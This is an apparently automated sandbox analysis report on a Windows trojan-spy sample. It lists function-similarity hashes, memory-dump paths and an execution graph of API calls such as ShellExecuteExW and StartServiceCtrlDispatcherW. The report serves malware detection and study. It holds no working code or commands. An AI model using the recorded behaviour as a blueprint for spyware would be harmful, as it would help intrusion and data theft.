                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentFreeStrings$Heap$AllocateErrorLast
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 1848424169-1631433037
                                                                                                      • Opcode ID: b6a04fea2e6691cd475f1294f2ce5ffa6e45bea10a0c99e5ec4a87127725abdd
                                                                                                      • Instruction ID: 215c8cc1c75465ebe780b8a6b8e821cf40bdbb5fa38c8284518dbc17956be2dd
                                                                                                      • Opcode Fuzzy Hash: b6a04fea2e6691cd475f1294f2ce5ffa6e45bea10a0c99e5ec4a87127725abdd
                                                                                                      • Instruction Fuzzy Hash: 03318722A0A75281EA659F26684007E6FA5FF54FD5F48423AEBDE93BC5DF3CE4418300
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: f4985b051c93d1ffe9d611e842d6d6136a1aebebfe2613dad447161918752a3f
                                                                                                      • Instruction ID: bafb6c3f0a175c7bcd671fa37fb7aaba81283b96cfa2d6f24a435ca097377d10
                                                                                                      • Opcode Fuzzy Hash: f4985b051c93d1ffe9d611e842d6d6136a1aebebfe2613dad447161918752a3f
                                                                                                      • Instruction Fuzzy Hash: EFD10332B1AA8189E710CFB5D4402AC3BB5FB14B9AB454236DF9ED7B99DE38D406C300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CodeInfoPageValid
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 546120528-1631433037
                                                                                                      • Opcode ID: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
                                                                                                      • Instruction ID: 0759fc66cbaa7c17ee9c7c29a4026e63be65559624f1126da0474120c5f47be5
                                                                                                      • Opcode Fuzzy Hash: 46c349e5193ee86d75655e4a574d5ad4ddb955498f1696478ddccb8521d54604
                                                                                                      • Instruction Fuzzy Hash: 6581CC63A0E68282EB658F26A040179BFA1EB54782F584037CBEEC7A91DF3CE545C304
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                      • Opcode ID: 1ef23a5464c2794de408efda5d84bcc14a94eddb4dc116ddde8cda1a9e36996f
                                                                                                      • Instruction ID: 06143dfc80e0df7769395e8aacd3ba94d9bb589bbb66e4f64b2824ebbff8df55
                                                                                                      • Opcode Fuzzy Hash: 1ef23a5464c2794de408efda5d84bcc14a94eddb4dc116ddde8cda1a9e36996f
                                                                                                      • Instruction Fuzzy Hash: 7F71A17262A68296DB618F26908077D7FA1EB44F8AF248135DFCCC7A85DF2CD651C740
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                      • Opcode ID: 635710ddb9ab94d1a55a8cd141b7dc412ae530ff3b0bfee5224db4b61107a7b5
                                                                                                      • Instruction ID: 98f57f38f69a3d657d5b0e7a7164946e0118fec3762fc9df172e0c4d8630cdfc
                                                                                                      • Opcode Fuzzy Hash: 635710ddb9ab94d1a55a8cd141b7dc412ae530ff3b0bfee5224db4b61107a7b5
                                                                                                      • Instruction Fuzzy Hash: 0B51707662A74596E620EF16E44026E7FA8F788B91F100138EBCD87B95DF3CE550CB01
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, xrefs: 00007FF6C7877152
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                      • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                      • API String ID: 3580290477-1341743030
                                                                                                      • Opcode ID: 826ece68b2de395fc5557eeabaea98f135a51b0408a18a67728276ec84c6d2a4
                                                                                                      • Instruction ID: ca0118195e139b0f17651ecc27e4581ad0ad58941383a4228dd264e039db597d
                                                                                                      • Opcode Fuzzy Hash: 826ece68b2de395fc5557eeabaea98f135a51b0408a18a67728276ec84c6d2a4
                                                                                                      • Instruction Fuzzy Hash: 8C416C32B0AB5295EB58DF25A8801BD2BA6EB44B95B544035FB8FC3B85DE3DE481C310
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 45453d0a4cb618e3adf22ee76669d7d8896708ec24ad589fac43c11eaffff017
                                                                                                      • Instruction ID: 85f1775e7a6d8a9694ec78d74a5b8cbd9e5c80e4a70d768f0862f750a8022d41
                                                                                                      • Opcode Fuzzy Hash: 45453d0a4cb618e3adf22ee76669d7d8896708ec24ad589fac43c11eaffff017
                                                                                                      • Instruction Fuzzy Hash: 4441A322B1AA4191DB60CF25E8443BA6BA4FB98795F854035EF8EC7798DF3CD541C740
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1838369231-1405518554
                                                                                                      • Opcode ID: 7d49fe92b0c7c85a1320eea0bc9836c521db474d021f354e7151b42a68dd87d1
                                                                                                      • Instruction ID: 3fe48c5e534612cc1d0809d9c20e9f304249cc8ef25c2f4547fbd4d5b9707acb
                                                                                                      • Opcode Fuzzy Hash: 7d49fe92b0c7c85a1320eea0bc9836c521db474d021f354e7151b42a68dd87d1
                                                                                                      • Instruction Fuzzy Hash: 64014B3251AB818AD7859F75A88015D7AA5FB68B88B185139CB9CC371AEF38C5A0C340
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 1f17b112604c356c224eb2ed1e8f8d2ca513bdd1cb9f3ebf4d5e436a80b3cb1e
                                                                                                      • Instruction ID: e4d11125dbd464d86453b4f8c834b7b9103da8e497506aa08a866c403335745d
                                                                                                      • Opcode Fuzzy Hash: 1f17b112604c356c224eb2ed1e8f8d2ca513bdd1cb9f3ebf4d5e436a80b3cb1e
                                                                                                      • Instruction Fuzzy Hash: F8112E32619B4182EB618F15F440269BBE4FB88B85F584235DBCC87754DF3DD551C700

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.3%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:1289
                                                                                                      Total number of Limit Nodes:43
                                                                                                      execution_graph: serialized node and edge listing of the interactive execution-graph viewer (function addresses in the 7ff76e18xxxx to 7ff76e1axxxx range, the CRT/runtime symbol names resolved for them, and the Windows API calls made from each node, e.g. GetStartupInfoW, GetFileType, GetStdHandle, FlsGetValue/FlsSetValue, RtlAllocateHeap, HeapFree, IsDebuggerPresent, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, GetCurrentProcess, TerminateProcess, InitializeCriticalSectionAndSpinCount, LoadLibraryExW, RtlEnterCriticalSection, GetModuleFileNameW); the raw listing is not reproduced here.
7ff76e19d35c _set_fmode 6 API calls 19703->19704 19705 7ff76e19e35a 19704->19705 19708 7ff76e1a2448 __free_lconv_mon 6 API calls 19705->19708 19706 7ff76e19e38f 19710 7ff76e1a2448 __free_lconv_mon 6 API calls 19706->19710 19707 7ff76e19e36d 19707->19706 19711 7ff76e19e3d4 19707->19711 19712 7ff76e19e3bb 19707->19712 19709 7ff76e19e368 19708->19709 19709->19694 19710->19694 19714 7ff76e1a2448 __free_lconv_mon 6 API calls 19711->19714 19713 7ff76e1a2448 __free_lconv_mon 6 API calls 19712->19713 19715 7ff76e19e3c4 19713->19715 19714->19706 19716 7ff76e1a2448 __free_lconv_mon 6 API calls 19715->19716 19716->19709 19718 7ff76e1a1df0 _Getctype 28 API calls 19717->19718 19719 7ff76e19f559 19718->19719 19720 7ff76e19f58d 19719->19720 19721 7ff76e19d35c _set_fmode 6 API calls 19719->19721 19720->19676 19722 7ff76e19f582 19721->19722 19723 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 19722->19723 19723->19720 19725 7ff76e191306 _fread_nolock BuildCatchObjectHelperInternal 19724->19725 19726 7ff76e191325 RtlCaptureContext RtlLookupFunctionEntry 19725->19726 19727 7ff76e19138a _fread_nolock 19726->19727 19728 7ff76e19134e RtlVirtualUnwind 19726->19728 19729 7ff76e1913bc IsDebuggerPresent 19727->19729 19728->19727 19730 7ff76e1913fb BuildCatchObjectHelperInternal 19729->19730 19730->19670 19732 7ff76e190d4a 19731->19732 19734 7ff76e190d43 shared_ptr 19731->19734 19735 7ff76e1a0c8c 19732->19735 19734->19691 19738 7ff76e1a08c8 19735->19738 19737 7ff76e1a0cce 19737->19734 19739 7ff76e1a08e4 19738->19739 19742 7ff76e1a0940 19739->19742 19741 7ff76e1a08ed 19741->19737 19743 7ff76e1a096c 19742->19743 19751 7ff76e1a0a01 19742->19751 19744 7ff76e1a09dd 19743->19744 19743->19751 19752 7ff76e1ae4fc 19743->19752 19746 7ff76e1ae4fc shared_ptr 8 API calls 19744->19746 19744->19751 19748 7ff76e1a09f7 19746->19748 19747 7ff76e1a09d3 19749 7ff76e1a2448 __free_lconv_mon 6 API calls 19747->19749 19750 7ff76e1a2448 __free_lconv_mon 6 API calls 19748->19750 19749->19744 19750->19751 
19751->19741 19753 7ff76e1ae51e 19752->19753 19757 7ff76e1ae53b 19752->19757 19754 7ff76e1ae52c 19753->19754 19753->19757 19755 7ff76e19d35c _set_fmode 6 API calls 19754->19755 19756 7ff76e1ae531 _fread_nolock 19755->19756 19756->19747 19759 7ff76e1a9584 19757->19759 19760 7ff76e1a95a3 19759->19760 19761 7ff76e1a9599 19759->19761 19763 7ff76e1a95a8 19760->19763 19769 7ff76e1a95af _set_fmode std::_Facet_Register 19760->19769 19770 7ff76e1a4340 19761->19770 19764 7ff76e1a2448 __free_lconv_mon 6 API calls 19763->19764 19767 7ff76e1a95a1 19764->19767 19765 7ff76e1a95e2 RtlReAllocateHeap 19765->19767 19765->19769 19766 7ff76e1a95b5 19768 7ff76e19d35c _set_fmode 6 API calls 19766->19768 19767->19756 19768->19767 19769->19765 19769->19766 19771 7ff76e1a438b 19770->19771 19775 7ff76e1a434f _set_fmode std::_Facet_Register 19770->19775 19772 7ff76e19d35c _set_fmode 6 API calls 19771->19772 19774 7ff76e1a4389 19772->19774 19773 7ff76e1a4372 RtlAllocateHeap 19773->19774 19773->19775 19774->19767 19775->19771 19775->19773 19777 7ff76e19e25c 19776->19777 19778 7ff76e19e294 19776->19778 19777->19778 19779 7ff76e1a23d0 _set_fmode 6 API calls 19777->19779 19778->19703 19778->19707 19780 7ff76e19e28a 19779->19780 19781 7ff76e1a2448 __free_lconv_mon 6 API calls 19780->19781 19781->19778 23269 7ff76e18a8c0 23270 7ff76e18a8d8 23269->23270 23278 7ff76e18a8e4 ctype 23269->23278 23271 7ff76e18aa4d 23272 7ff76e18a8f9 ctype 23271->23272 23274 7ff76e19bbd4 _fread_nolock 36 API calls 23271->23274 23276 7ff76e18ab5f 23272->23276 23277 7ff76e18ab44 23272->23277 23282 7ff76e18aad9 23272->23282 23274->23272 23275 7ff76e190580 _log10_special 4 API calls 23279 7ff76e18acea 23275->23279 23281 7ff76e196a9c 37 API calls 23276->23281 23297 7ff76e196a9c 23277->23297 23278->23271 23278->23272 23294 7ff76e19bbd4 23278->23294 23287 7ff76e18ab7f ctype 23281->23287 23282->23275 23283 7ff76e18ac9c 23283->23282 23285 7ff76e18ad67 23283->23285 23284 7ff76e18e040 30 API calls 23284->23287 23286 7ff76e19c3e4 
_invalid_parameter_noinfo_noreturn 28 API calls 23285->23286 23291 7ff76e18ad6c 23286->23291 23287->23283 23287->23284 23288 7ff76e196a9c 37 API calls 23287->23288 23290 7ff76e18ad1b 23287->23290 23288->23287 23290->23283 23318 7ff76e19b8e4 23290->23318 23292 7ff76e18ad94 23291->23292 23293 7ff76e19b8e4 30 API calls 23291->23293 23293->23292 23330 7ff76e19bbf4 23294->23330 23298 7ff76e196ad6 23297->23298 23299 7ff76e196ab8 23297->23299 23344 7ff76e196494 RtlEnterCriticalSection 23298->23344 23300 7ff76e19d35c _set_fmode 6 API calls 23299->23300 23303 7ff76e196abd 23300->23303 23304 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 23303->23304 23315 7ff76e196ac8 23304->23315 23315->23282 23319 7ff76e19b91b 23318->23319 23320 7ff76e19b8fd 23318->23320 23345 7ff76e196494 RtlEnterCriticalSection 23319->23345 23322 7ff76e19d35c _set_fmode 6 API calls 23320->23322 23324 7ff76e19b902 23322->23324 23326 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 23324->23326 23328 7ff76e19b90d 23326->23328 23328->23290 23331 7ff76e19bc1e 23330->23331 23332 7ff76e19bbec 23330->23332 23331->23332 23333 7ff76e19bc6a 23331->23333 23334 7ff76e19bc2d _fread_nolock 23331->23334 23332->23278 23343 7ff76e196494 RtlEnterCriticalSection 23333->23343 23337 7ff76e19d35c _set_fmode 6 API calls 23334->23337 23339 7ff76e19bc42 23337->23339 23341 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 23339->23341 23341->23332 23354 7ff76e18a4d0 23355 7ff76e18a516 23354->23355 23356 7ff76e18a4e3 23354->23356 23356->23355 23359 7ff76e196834 23356->23359 23360 7ff76e196842 23359->23360 23361 7ff76e196849 23359->23361 23365 7ff76e19666c 23360->23365 23363 7ff76e18a506 23361->23363 23368 7ff76e19662c 23361->23368 23375 7ff76e196548 23365->23375 23367 7ff76e1966b8 23367->23363 23387 7ff76e196494 RtlEnterCriticalSection 23368->23387 23377 7ff76e196567 23375->23377 23376 7ff76e196611 23376->23367 23377->23376 23379 7ff76e1964ac 23377->23379 23386 7ff76e196494 RtlEnterCriticalSection 23379->23386 19782 
7ff76e1909ac 19806 7ff76e190b80 19782->19806 19785 7ff76e190b03 19787 7ff76e1912e0 5 API calls 19785->19787 19786 7ff76e1909cd __scrt_acquire_startup_lock 19788 7ff76e190b0d 19786->19788 19796 7ff76e1909eb __scrt_release_startup_lock 19786->19796 19787->19788 19789 7ff76e1912e0 5 API calls 19788->19789 19791 7ff76e190b18 BuildCatchObjectHelperInternal 19789->19791 19790 7ff76e190a10 19872 7ff76e1911d4 19791->19872 19794 7ff76e190a96 19812 7ff76e19ea0c 19794->19812 19796->19790 19796->19794 19861 7ff76e19edb8 19796->19861 19798 7ff76e190a9b 19818 7ff76e182090 19798->19818 19803 7ff76e190ac3 19868 7ff76e190d04 19803->19868 19807 7ff76e190b88 19806->19807 19808 7ff76e190b94 __scrt_dllmain_crt_thread_attach 19807->19808 19809 7ff76e190ba1 19808->19809 19811 7ff76e1909c5 19808->19811 19809->19811 19875 7ff76e1927a0 19809->19875 19811->19785 19811->19786 19813 7ff76e19ea1c 19812->19813 19817 7ff76e19ea31 19812->19817 19813->19817 19883 7ff76e19e49c 19813->19883 19817->19798 19945 7ff76e18ca60 19818->19945 19820 7ff76e18220d 19821 7ff76e18ca60 30 API calls 19820->19821 19822 7ff76e18227d 19821->19822 19823 7ff76e18ca60 30 API calls 19822->19823 19824 7ff76e1826af GetCurrentProcessId 19823->19824 19825 7ff76e1826c0 19824->19825 19826 7ff76e18ca60 30 API calls 19825->19826 19827 7ff76e182804 19826->19827 19829 7ff76e182842 ctype 19827->19829 20020 7ff76e18e340 19827->20020 19830 7ff76e1828a5 ShellExecuteExW 19829->19830 19831 7ff76e182a10 19830->19831 19831->19831 19832 7ff76e18ca60 30 API calls 19831->19832 19833 7ff76e182a42 lstrcmpiW 19832->19833 19834 7ff76e182a6c 19833->19834 19835 7ff76e182c91 StartServiceCtrlDispatcherW 19833->19835 19959 7ff76e1831e0 GetModuleFileNameW 19834->19959 19837 7ff76e182cd0 19835->19837 19844 7ff76e182a71 19835->19844 19839 7ff76e18ca60 30 API calls 19837->19839 19838 7ff76e1831be 19840 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19838->19840 19842 7ff76e182f61 19839->19842 19841 7ff76e1831c4 19840->19841 19845 
7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19841->19845 20026 7ff76e183d40 RegisterEventSourceW 19842->20026 19844->19838 19844->19841 19846 7ff76e1831ca 19844->19846 19849 7ff76e1831d0 19844->19849 19850 7ff76e182c00 19844->19850 19853 7ff76e1831ad 19844->19853 19858 7ff76e1831b8 19844->19858 19845->19846 19848 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19846->19848 19847 7ff76e182c55 19851 7ff76e190580 _log10_special 4 API calls 19847->19851 19848->19849 19852 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19849->19852 19850->19847 19854 7ff76e1831b2 19850->19854 19856 7ff76e182c6b 19851->19856 19857 7ff76e1831d6 19852->19857 20033 7ff76e19c3e4 19853->20033 19859 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19854->19859 19866 7ff76e191430 GetModuleHandleW 19856->19866 19860 7ff76e19c3e4 _invalid_parameter_noinfo_noreturn 28 API calls 19858->19860 19859->19858 19860->19838 19862 7ff76e19edf0 19861->19862 19863 7ff76e19edcf 19861->19863 20551 7ff76e1a0e78 19862->20551 19863->19794 19867 7ff76e190abf 19866->19867 19867->19791 19867->19803 19869 7ff76e190d15 19868->19869 19870 7ff76e190ad6 19869->19870 19871 7ff76e1927a0 RtlDeleteCriticalSection 19869->19871 19870->19790 19871->19870 19873 7ff76e1911f7 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19872->19873 19874 7ff76e190b39 19872->19874 19873->19874 19876 7ff76e1927b2 19875->19876 19877 7ff76e1927a8 __vcrt_uninitialize_ptd 19875->19877 19876->19811 19879 7ff76e195be4 19877->19879 19880 7ff76e195c0f 19879->19880 19881 7ff76e195bf2 RtlDeleteCriticalSection 19880->19881 19882 7ff76e195c13 19880->19882 19881->19880 19884 7ff76e19e4b5 19883->19884 19891 7ff76e19e4b1 19883->19891 19904 7ff76e1aad5c GetEnvironmentStringsW 19884->19904 19887 7ff76e19e4c2 19889 7ff76e1a2448 __free_lconv_mon 6 API calls 19887->19889 19888 7ff76e19e4ce 19911 7ff76e19e61c 19888->19911 19889->19891 19891->19817 19896 7ff76e19e85c 
19891->19896 19893 7ff76e1a2448 __free_lconv_mon 6 API calls 19894 7ff76e19e4f5 19893->19894 19895 7ff76e1a2448 __free_lconv_mon 6 API calls 19894->19895 19895->19891 19897 7ff76e19e87f 19896->19897 19902 7ff76e19e896 19896->19902 19897->19817 19898 7ff76e1a9680 MultiByteToWideChar _fread_nolock 19898->19902 19899 7ff76e1a23d0 _set_fmode 6 API calls 19899->19902 19900 7ff76e19e90a 19901 7ff76e1a2448 __free_lconv_mon 6 API calls 19900->19901 19901->19897 19902->19897 19902->19898 19902->19899 19902->19900 19903 7ff76e1a2448 __free_lconv_mon 6 API calls 19902->19903 19903->19902 19905 7ff76e1aad80 19904->19905 19906 7ff76e19e4ba 19904->19906 19907 7ff76e1a4340 _fread_nolock 7 API calls 19905->19907 19906->19887 19906->19888 19909 7ff76e1aadb7 ctype 19907->19909 19908 7ff76e1a2448 __free_lconv_mon 6 API calls 19910 7ff76e1aadd7 FreeEnvironmentStringsW 19908->19910 19909->19908 19910->19906 19912 7ff76e19e644 19911->19912 19913 7ff76e1a23d0 _set_fmode 6 API calls 19912->19913 19925 7ff76e19e67f 19913->19925 19914 7ff76e19e687 19915 7ff76e1a2448 __free_lconv_mon 6 API calls 19914->19915 19916 7ff76e19e4d6 19915->19916 19916->19893 19917 7ff76e19e701 19918 7ff76e1a2448 __free_lconv_mon 6 API calls 19917->19918 19918->19916 19919 7ff76e1a23d0 _set_fmode 6 API calls 19919->19925 19920 7ff76e19e6f0 19939 7ff76e19e738 19920->19939 19924 7ff76e19e724 19928 7ff76e19c414 _invalid_parameter_noinfo_noreturn 11 API calls 19924->19928 19925->19914 19925->19917 19925->19919 19925->19920 19925->19924 19927 7ff76e1a2448 __free_lconv_mon 6 API calls 19925->19927 19930 7ff76e1a8dd8 19925->19930 19926 7ff76e1a2448 __free_lconv_mon 6 API calls 19926->19914 19927->19925 19929 7ff76e19e736 19928->19929 19931 7ff76e1a8def 19930->19931 19932 7ff76e1a8de5 19930->19932 19933 7ff76e19d35c _set_fmode 6 API calls 19931->19933 19932->19931 19937 7ff76e1a8e0b 19932->19937 19934 7ff76e1a8df7 19933->19934 19935 7ff76e19c3c4 _invalid_parameter_noinfo 28 API calls 19934->19935 19936 7ff76e1a8e03 
